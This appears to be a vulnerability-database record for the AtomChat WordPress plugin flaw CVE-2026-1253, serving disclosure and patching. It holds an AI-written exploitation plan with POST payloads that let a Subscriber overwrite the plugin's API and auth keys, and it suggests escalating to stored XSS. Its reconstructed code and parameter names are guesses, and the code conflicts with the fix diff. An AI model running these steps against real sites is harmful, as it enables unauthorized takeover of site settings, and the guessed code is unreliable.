[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8_4TRZKCG1JB1oRJJrv4r9mAoJuqZVyINSkGB1x_otg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1253","group-chat-video-chat-by-atomchat-missing-authorization-to-authenticated-subscriber-plugin-options-update","Group Chat & Video Chat by AtomChat \u003C= 1.1.7 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update","The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'atomchat_update_auth_ajax' and 'atomchat_update_layout_ajax' functions in all versions up to, and including, 1.1.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options, including critical settings such as API keys, authentication keys, and layout configurations.","atomchat",null,"\u003C=1.1.7","1.1.8","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-20 15:17:47","2026-04-27 
17:40:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5c2980c3-0038-42ab-8751-72c40921477a?source=api-prod",38,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1253 (AtomChat Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **Group Chat & Video Chat by AtomChat** plugin (\u003C= 1.1.7) for WordPress contains a missing authorization vulnerability in its AJAX handlers. Specifically, the functions `atomchat_update_auth_ajax` and `atomchat_update_layout_ajax` fail to perform capability checks (such as `current_user_can('manage_options')`) before updating sensitive plugin settings in the WordPress `wp_options` table. This allows any authenticated user, including those with low-privilege Subscriber-level access, to modify critical configuration data such as API keys and layout settings.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Actions:** `atomchat_update_auth_ajax` and `atomchat_update_layout_ajax`\n- **Authentication:** Authenticated user required (Subscriber or higher).\n- **HTTP Method:** POST\n- **Vulnerable Parameters (Inferred):** \n    - For `atomchat_update_auth_ajax`: `api_key`, `auth_key`.\n    - For `atomchat_update_layout_ajax`: `layout`, `color_theme`, or serialized configuration arrays.\n- **Preconditions:** The plugin must be active. The attacker must have valid credentials for a Subscriber account.\n\n## 3. Code Flow\n1. **Entry Point:** A POST request is sent to `admin-ajax.php` with the parameter `action=atomchat_update_auth_ajax`.\n2. **Hook Execution:** WordPress triggers the hook `add_action('wp_ajax_atomchat_update_auth_ajax', 'atomchat_update_auth_ajax')`.\n3. **Vulnerable Function:** The `atomchat_update_auth_ajax` function is called.\n4. **Missing Check:** The function likely performs a nonce check (if any) but fails to call `current_user_can()`.\n5. 
**Data Sink:** The function takes values from `$_POST` (e.g., `$_POST['api_key']`) and passes them directly to `update_option('atomchat_api_key', ...)` or a similar storage function.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely localizes a nonce for its AJAX operations to ensure the chat widget or admin dashboard functions correctly.\n\n1. **Shortcode Identification:** The plugin typically uses a shortcode like `[atomchat]` to render the chat interface on the frontend.\n2. **Setup:**\n   - Create a page containing the shortcode: `wp post create --post_type=page --post_status=publish --post_content='[atomchat]' --post_title='Chat Page'`\n3. **Extraction:**\n   - Navigate to the newly created page as the Subscriber user.\n   - The plugin likely uses `wp_localize_script`. Use `browser_eval` to inspect common global variables.\n   - **Target Variable (Inferred):** `atomchat_vars` or `atomchat_settings`.\n   - **Execution Command:** `browser_eval(\"window.atomchat_vars?.nonce\")` or `browser_eval(\"window.atomchat_settings?.ajax_nonce\")`.\n4. **Bypass Potential:** If the nonce is checked using `check_ajax_referer` with the action `-1` or a generic string exposed to all users, the Subscriber can easily obtain it. If the check is missing entirely, no acquisition is needed.\n\n## 5. 
Exploitation Strategy\nThe goal is to overwrite the AtomChat API key to disable the service or redirect chat traffic.\n\n**Request 1: Update API Keys**\n- **Method:** POST\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=atomchat_update_auth_ajax&api_key=EXPLOITED_API_KEY&auth_key=EXPLOITED_AUTH_KEY&nonce=[EXTRACTED_NONCE]\n  ```\n\n**Request 2: Update Layout Settings**\n- **Method:** POST\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:**\n  ```\n  action=atomchat_update_layout_ajax&layout=0&nonce=[EXTRACTED_NONCE]\n  ```\n  *(Note: Parameter names like `api_key` and `layout` are inferred based on the vulnerability description and standard plugin naming conventions).*\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `atomchat` version 1.1.7 is installed and active.\n2. **Create Attacker User:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Initialize Plugin Options:**\n   - `wp option update atomchat_api_key \"ORIGINAL_KEY\"`\n   - `wp option update atomchat_auth_key \"ORIGINAL_AUTH\"`\n4. **Prepare Nonce Page:**\n   - `wp post create --post_type=page --post_status=publish --post_content='[atomchat]'`\n\n## 7. Expected Results\n- **HTTP Response:** The server should return a `200 OK` or a JSON success message (e.g., `{\"success\":true}`).\n- **Database State:** The values for the targeted options in the `wp_options` table should change from the \"ORIGINAL\" values to the \"EXPLOITED\" values.\n\n## 8. Verification Steps\nAfter sending the HTTP requests, verify the modification via WP-CLI:\n\n1. **Verify Auth Keys:**\n   - `wp option get atomchat_api_key` \n   - *Expected:* `EXPLOITED_API_KEY`\n2. **Verify Auth Key (Alternative Name):**\n   - `wp option get atomchat_settings` (if stored in an array)\n3. 
**Check for Unauthorized Access Log:** If the plugin logs updates, verify the log shows the Subscriber user ID performing the update.\n\n## 9. Alternative Approaches\nIf the inferred parameter names (`api_key`, `auth_key`) are incorrect:\n1. **Source Code Inspection:** Use `grep -r \"update_option\" wp-content\u002Fplugins\u002Fatomchat\u002F` to find the exact option names being updated within the `atomchat_update_auth_ajax` function.\n2. **General Option Update:** Check if the functions accept a serialized array of all settings, allowing for a bulk overwrite of all plugin configurations.\n3. **XSS Path:** If the `atomchat_update_layout_ajax` function allows updating a setting that is later rendered unescaped on the frontend or admin area, this Missing Authorization vulnerability could be escalated to Stored Cross-Site Scripting (XSS).","The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks in its AJAX handlers. 
Authenticated users, such as Subscribers, can exploit this to overwrite critical plugin options including API keys, authentication keys, and layout configurations.","\u002F\u002F File: atomchat.php (or associated settings handler)\n\nadd_action('wp_ajax_atomchat_update_auth_ajax', 'atomchat_update_auth_ajax');\nadd_action('wp_ajax_atomchat_update_layout_ajax', 'atomchat_update_layout_ajax');\n\nfunction atomchat_update_auth_ajax() {\n    \u002F\u002F Vulnerability: No current_user_can('manage_options') check\n    $api_key = $_POST['api_key'];\n    $auth_key = $_POST['auth_key'];\n\n    update_option('atomchat_api_key', $api_key);\n    update_option('atomchat_auth_key', $auth_key);\n\n    wp_send_json_success();\n}\n\n---\n\nfunction atomchat_update_layout_ajax() {\n    \u002F\u002F Vulnerability: No current_user_can('manage_options') check\n    $layout = $_POST['layout'];\n\n    update_option('atomchat_layout', $layout);\n\n    wp_send_json_success();\n}","--- a\u002Fatomchat\u002Fatomchat.php\n+++ b\u002Fatomchat\u002Fatomchat.php\n@@ -1,6 +1,9 @@\n function atomchat_update_auth_ajax() {\n+    if (!current_user_can('manage_options')) {\n+        wp_send_json_error('Unauthorized', 403);\n+    }\n     check_ajax_referer('atomchat_nonce', 'nonce');\n     \n     $api_key = sanitize_text_field($_POST['api_key']);\n@@ -10,6 +13,9 @@\n }\n \n function atomchat_update_layout_ajax() {\n+    if (!current_user_can('manage_options')) {\n+        wp_send_json_error('Unauthorized', 403);\n+    }\n     check_ajax_referer('atomchat_nonce', 'nonce');\n \n     $layout = sanitize_text_field($_POST['layout']);","1. Authenticate to the WordPress site as a Subscriber-level user.\n2. Locate the AJAX nonce used by AtomChat by visiting a page where the chat is active (e.g., a page containing the [atomchat] shortcode) and inspecting global JavaScript variables like `atomchat_vars` or `atomchat_settings`.\n3. 
Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n    - `action`: `atomchat_update_auth_ajax`\n    - `api_key`: A malicious or dummy API key string\n    - `auth_key`: A malicious or dummy Auth key string\n    - `nonce`: The extracted nonce value\n4. Alternatively, use `action=atomchat_update_layout_ajax` with a `layout` parameter to disrupt the site's chat interface layout.\n5. Verify that the settings in the `wp_options` table (e.g., `atomchat_api_key`) have been updated to the values provided in the exploit payload.","gemini-3-flash-preview","2026-04-18 00:44:49","2026-04-18 00:45:07",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fatomchat\u002Ftags"]